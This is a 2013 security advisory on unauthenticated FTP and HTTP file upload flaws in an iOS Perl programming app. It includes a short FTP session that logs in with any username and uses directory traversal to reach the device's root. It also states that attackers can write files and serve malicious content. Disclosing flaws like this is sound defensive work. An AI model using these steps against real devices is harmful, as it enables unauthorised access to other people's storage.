TITLE: Unauthenticated Remote File Upload via HTTP for perl-Programming language 1.6 on iOS

Date: 8/1/2013

Author: Larry W. Cashdollar, @_larry0

Download:

  1. https://itunes.apple.com/us/app/perl-programming-language/id578116006?mt=8&ls=1
  2. http://www.tayutec.com/indexen.html

Description: "This is an ios perl app,you can learn,run,share perl script. Features :
Autocomplate.
Auto Indent.
Code color.
In(the built-in browser or the txt editor),Select the text to run.
Horizontal screen development.

Code templates, the contents of the new file is copy from contents of the template file.

Vulnerabilities: 'iOSftp' & http unauthenticated file uplolads. The application is sandboxed, but any remote user can read/write to the devices storage.
The uploaded content is served out of the http servers directory. While the http server doesn't process server side scripts it is possible to upload and serve malicious / illegal content. I would think it's also possible to fill up the devices storage as well but did not test it.
larry$ ftp 192.168.0.31  10000
Connected to 192.168.0.31.
220 iosFtp server ready.
Name (192.168.0.31:larry): anyone
331 Password required for anyone
Password: 
230 User anyone logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /private/var/mobile/Applications/311BCF0D-B9D8-4DC0-BE4C-2EC0887EE2CE/Documents/ftp *
ftp> cd ../../../../
250 CWD command successful.
ftp> pwd
Remote directory: /private/var/mobile
ftp> cd /
250 CWD command successful.
ftp> pwd
Remote directory: /
ftp> 
* You also get path disclosure.
http server listening on port 8080 allows arbitrary file writes to storage.
You can create directories out side the upload path through the file upload web interface and the .. bug.
Because the application is sandbox I was unable to overwtite application executables and components so impact is limited. As stated above you can serve malicious content (javascript/html) via http.

Vendor: Notified 8/1/2013, https://twitter.com/tayutec

Advisory: http://vapid.dhs.org/advisories/perl-ios-Huang-XiaoWen.html